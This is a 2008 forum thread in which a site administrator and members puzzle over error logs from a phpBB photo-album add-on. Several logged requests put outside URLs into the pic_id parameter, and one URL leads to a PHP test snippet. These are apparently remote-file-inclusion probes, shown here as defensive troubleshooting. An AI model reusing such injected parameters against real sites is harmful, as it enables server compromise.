View previous topic :: View next topic |
Author |
Message |
kal Forum Administrator
Joined: 06 Mar 2006 Posts: 17860 Location: Ottawa, Canada
TV/Projector: JVC DLA-NZ7
|
Link Posted: Mon Mar 03, 2008 10:13 pm Post subject: We're being spammed and I can't figure out ... |
|
|
A free Club Membership to anyone that helps me figure this out!
Whenever the forum throws an error, I get emailed. Helps me keep on top of problems.
For some time now however, I've been getting emails like this:
Code: |
General Error Message:
The photo does not exist.
IP: 8.4.9.191
USER: Anonymous
URL: /forum/album_page.php?pic_id=http%3A%2F%2Fwww.felixtorresycia.com%2Fadmin%2Fcorreo%2Fenaq%2Fecib%2F&sid=f5c66f40f47522f6423f81281d79ac5a
FORM:
Array
(
)
|
The first part of the URL info (/forum/album_page.php?pic_id=) tells me that someone tried to view an image in our Photo Album but the second half is the spammy made up part that points to some SPAM site.
This happens every day. Random URLs.
So I'm:
(1) Not sure why someone's doing this (what's the point?)
(2) How they expect this to do something for them?
Kal
_________________
Support our site by using our affiliate links. We thank you!
My basement/HT/bar/brewery build 2.0
Last edited by kal on Mon Mar 03, 2008 10:15 pm; edited 1 time in total
|
|
Back to top |
|
|
kal Forum Administrator
Joined: 06 Mar 2006 Posts: 17860 Location: Ottawa, Canada
TV/Projector: JVC DLA-NZ7
|
Link Posted: Mon Mar 03, 2008 10:14 pm Post subject: |
|
|
Here are a few others in case anyone's curious:
Code: |
General Error Message:
The photo does not exist.
IP: 8.4.9.191
USER: Anonymous
URL: /forum/album_page.php?pic_id=http%3A%2F%2Fwww.elettrodataservice.it%2Ffoto_articoli%2Fonoda%2Fiyegimi%2F&sid=f5c66f40f47522f6423f81281d79ac5a
FORM:
Array
(
) |
Code: | General Error Message:
The photo does not exist.
IP: 216.239.91.165
USER: Anonymous
URL: /forum/album_page.php?pic_id=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Fleboma%2F&sid=f9ced0c5f38072cad9e97c9c2ed4055f
FORM:
Array
(
) |
Code: |
General Error Message:
The photo does not exist.
IP: 216.239.91.165
USER: Anonymous
URL: /forum/album_page.php?pic_id=http%3A%2F%2Fwww.cjp.spb.ru%2Fen%2Ftis%2Fleboma%2F&sid=f9ced0c5f38072cad9e97c9c2ed4055f
FORM:
Array
(
) |
Always the same thing, different URL.
Kal
_________________
Support our site by using our affiliate links. We thank you!
My basement/HT/bar/brewery build 2.0
|
|
Back to top |
|
|
ecrabb Forum Moderator
Joined: 13 Mar 2006 Posts: 15909 Location: Utah
TV/Projector: JVC RS40, Epson 5010
|
Link Posted: Mon Mar 03, 2008 11:23 pm Post subject: |
|
|
'&sid' is a session id - a unique identifier. When I turn the URL in the second error message above, back into a URL:
http://www.cjp.spb.ru/en/tis/leboma/&sid=f9ced0c5f38072cad9e97c9c2ed4055f
I get this error message:
Code: | <?php echo md5("just_a_test");?> |
Same with the others. So, it makes a request to a PHP server. I'm guessing the link is databasing hits to track good email addresses to spam. As for why those URL's are ending up pointing to the forum's gallery, that I don't get. Server-side database stuff is way over my head, but I wonder if maybe there is some sort of security hole in phpBB they're exploiting (or trying to exploit)?
Seems like a mistake - maybe a spammers bad database server config...
Could you search/post in the phpBB user forum - those guys might actually know something there.
SC
|
|
Back to top |
|
|
kal Forum Administrator
Joined: 06 Mar 2006 Posts: 17860 Location: Ottawa, Canada
TV/Projector: JVC DLA-NZ7
|
Link Posted: Tue Mar 04, 2008 12:54 am Post subject: |
|
|
Interesting SC. I never followed this thing through but you're right.
That code you mentioned isn't an error message - it's just HTML with imbedded PHP code that the web server on their end isn't parsing through correctly first and therefore their web server just displays the entire code. If their PHP parser was 'on' the end result should be the the text "just_a_test" in your browser.
So I understand what's going but I still don't understand how the spammers are hoping to accomplish anything like you said. The photo album URL/feature they're using isn't in the base phpbb code. It's a popular addon mod.
Weird.
Thanks for the input/sleuthing though. I added an extra year to your club membership, just because. You now expire on 2009/10/16 21:00:00 instead of 2008/10/16 21:00:00
Kal
_________________
Support our site by using our affiliate links. We thank you!
My basement/HT/bar/brewery build 2.0
|
|
Back to top |
|
|
kal Forum Administrator
Joined: 06 Mar 2006 Posts: 17860 Location: Ottawa, Canada
TV/Projector: JVC DLA-NZ7
|
|
Back to top |
|
|
AnalogRocks Forum Moderator
Joined: 08 Mar 2006 Posts: 26690 Location: Toronto, Ontario, Canada
TV/Projector: Sony 1252Q, AMPRO 4000G
|
Link Posted: Tue Mar 04, 2008 1:55 am Post subject: |
|
|
kal wrote: | SC.
You now expire on 2009/10/16 21:00:00 instead of 2008/10/16 21:00:00
Kal |
Whew a repreeve. Make sure to get your afairs in order. Hell remember to have some afairs! Before you expire SC
_________________ Tech support for nothing
CRT.
HD done right!
|
|
Back to top |
|
|
AnalogRocks Forum Moderator
Joined: 08 Mar 2006 Posts: 26690 Location: Toronto, Ontario, Canada
TV/Projector: Sony 1252Q, AMPRO 4000G
|
Link Posted: Tue Mar 04, 2008 1:56 am Post subject: |
|
|
Hey Kal, why not turn off the photo albums for a bit and see if those particular spammers/crackers go away aond get some cheese to go with them?
_________________ Tech support for nothing
CRT.
HD done right!
|
|
Back to top |
|
|
kal Forum Administrator
Joined: 06 Mar 2006 Posts: 17860 Location: Ottawa, Canada
TV/Projector: JVC DLA-NZ7
|
|
Back to top |
|
|
ecrabb Forum Moderator
Joined: 13 Mar 2006 Posts: 15909 Location: Utah
TV/Projector: JVC RS40, Epson 5010
|
Link Posted: Tue Mar 04, 2008 4:57 am Post subject: |
|
|
Geez, Kal - you didn't have to do that. I just like helping when I can - to give back a little to my favorite forum! This place is like my hangout - it's like the clubhouse, man! Thanks a lot, though!!!
OK, so bots are finding Apache PHP boxes running phpBB and trying that little bit of PHP code. If the vulnerability wasn't patched on the server, then that URL would actually work and ping that page with the bogus 'test' message and lodge an entry there. From there, the IP is now in a database and gets put on the list to attempt to install some other vulnerability on the server later... is that about right?
Man, the effort these guys go to!
SC
|
|
Back to top |
|
|
oliverg
Joined: 15 May 2007 Posts: 800 Location: Melbourne, Australia
TV/Projector: Sony G90 X2 - Vidikron Vision 1
|
Link Posted: Tue Mar 04, 2008 12:34 pm Post subject: |
|
|
Most of the time, this type of activity is a bot looking for vulnerabilities.
Each server that is found to have holes gets logged and a database of vulnerable servers can be later used for nefarious purposes
Its like being port scanned, mostly harmless. As long as you or your host keeps up to date with all the relevant patches
The same type of thing happens with PCs and spammers using zombies (infected pcs that hackers can exert a level of control over) for mass SMTP relaying.
_________________ ( R ) G ( G ) 9 ( B ) 0 ( R ) G ( G ) 9 ( B ) 0
( R ) G ( G ) 9 ( B ) 0 ( R ) G ( G ) 9 ( B ) 0
|
|
Back to top |
|
|
kal Forum Administrator
Joined: 06 Mar 2006 Posts: 17860 Location: Ottawa, Canada
TV/Projector: JVC DLA-NZ7
|
|
Back to top |
|
|
kal Forum Administrator
Joined: 06 Mar 2006 Posts: 17860 Location: Ottawa, Canada
TV/Projector: JVC DLA-NZ7
|
Link Posted: Tue Mar 04, 2008 6:03 pm Post subject: |
|
|
Here's another (related?) error that we've been getting for years: Instead of a URL, there's a picture ID that's invalid.
Code: |
General Error Message:
The photo does not exist.
IP: 66.249.72.174
USER: Anonymous
URL: /forum/album_page.php?pic_id=26
FORM:
Array
(
)
|
The pic_id value varies. This one I think is a valid error that someone here is generating, but I've never been able to trace it to the source...
Another value from the last 24 hours:
Code: |
General Error Message:
The photo does not exist.
IP: 66.249.72.174
USER: Anonymous
URL: /forum/album_page.php?pic_id=189&mode=next
FORM:
Array
(
)
|
Kal
_________________
Support our site by using our affiliate links. We thank you!
My basement/HT/bar/brewery build 2.0
|
|
Back to top |
|
|
JustGreg
Joined: 07 Mar 2006 Posts: 3098 Location: Kenosha, WI
|
Link Posted: Tue Mar 04, 2008 8:13 pm Post subject: |
|
|
If the IP listed is that of the suspect, the first one originated in New York Latitude: 40.7488 Longitude: -73.9846
Tracing route to host-8-4-9-191.onlinehorizons.net (8.4.9.191):
Hops ---Avg ms--------Address
1--------- 1 ------------ ****************
2 -------- * ----------- ****************
3 -------- 9 ----------- ************************************************
4 -------- 8 ----------- ************************************************
5 -------- 11 ----------- ************************************************
6 -------- 29 ----------- 24.94.160.33 (so0-0-3.kscymoL3-rtr1.kc.rr.com)
7 -------- 25 ----------- 4.79.132.13 (ge-5-1-203.hsa1.StLouis1.Level3.net)
8 -------- 25 ----------- 4.69.132.186 (ae-11-11.car2.StLouis1.Level3.net)
9 -------- 34 ----------- 4.69.132.190 (ae-4-4.ebr2.Chicago1.Level3.net)
10 ------- 25 ------------ 4.68.101.161 (ae-2-56.bbr2.Chicago1.Level3.net)
11 ------- 45 ------------ 64.159.0.81 (so-0-2-0.mp2.Stamford1.Level3.net)
12 ------- 46 ------------ 4.68.124.98 (so-11-0.hsa1.Stamford1.Level3.net)
13 ------- 46 ------------ 8.4.9.191 (host-8-4-9-191.onlinehorizons.net) New York State
All the asterisks were placed by me...it's the first hops from my PC at the beginning of my query. It wouldn't be very smart to post the route into my PC now would it.
The second IP is from Canada.
Nothing from Asia or Russia.
Greg
_________________ Greg
"Is it ignorance or apathy? Hey, I don't know and I don't care!" --Jimmy Buffett
|
|
Back to top |
|
|
Malakay
Joined: 16 Mar 2006 Posts: 49 Location: Germany
|
Link Posted: Wed Mar 05, 2008 10:45 pm Post subject: |
|
|
The pictures in your error message does not exist.
Try these:
http://www.curtpalme.com/forum/album_page.php?pic_id=26
Insert pic_id numbers at the end of the above line that dont exist and take a look if you get an error message.
I dont know why someone try to open pics that dont exist, maybe you can ask in the phpBB Forums if this can be used to hack the forum. Im not a hacker, i dont know
/Edit: oh, and "&mode=next" only means that someone klicked on the next button on the picture, normal function
|
|
Back to top |
|
|
ecrabb Forum Moderator
Joined: 13 Mar 2006 Posts: 15909 Location: Utah
TV/Projector: JVC RS40, Epson 5010
|
Link Posted: Wed Mar 05, 2008 11:17 pm Post subject: |
|
|
Malakay wrote: | I dont know why someone try to open pics that dont exist, maybe you can ask in the phpBB Forums if this can be used to hack the forum. |
That's exactly what Kal was asking. If links to browser pics are all from forum (database)-generated links, there should never be an issue with missing photos.
The only thing I could come up with is that somebody was manually editing the URL hoping to see another few pics that weren't visible in the gallery or something. I actually do that with websites when I see a cool photo associated with a story, and wonder if there are more. For instance, when autoblog covered the new Chevrolet Corvette ZR1, they had a whole bunch of photos from Chevrolet on their server, that weren't available publicly. I found and downloaded them just by changing the number on the end of some of the photos. Got lots of cool pics to download that I haven't seen anywhere else... and probably generated a whole slew of error msgs for the autoblog version of Kal in the process.
SC
|
|
Back to top |
|
|
kal Forum Administrator
Joined: 06 Mar 2006 Posts: 17860 Location: Ottawa, Canada
TV/Projector: JVC DLA-NZ7
|
Link Posted: Thu Mar 06, 2008 1:06 am Post subject: |
|
|
ecrabb wrote: | Malakay wrote: | I dont know why someone try to open pics that dont exist, maybe you can ask in the phpBB Forums if this can be used to hack the forum. |
That's exactly what Kal was asking. If links to browser pics are all from forum (database)-generated links, there should never be an issue with missing photos. |
Yeah, that's exactly what I was getting at. No idea what code is generating these links that someone then clicks on. I can't figure it out myself.
Quote: | The only thing I could come up with is that somebody was manually editing the URL hoping to see another few pics that weren't visible in the gallery or something. |
Don't think so... I've been getting 4-5 of these these every day more or less for a few years now. It just seems too consistent and the numbers are never sequential. They're almost random.
Kal
_________________
Support our site by using our affiliate links. We thank you!
My basement/HT/bar/brewery build 2.0
|
|
Back to top |
|
|
|
|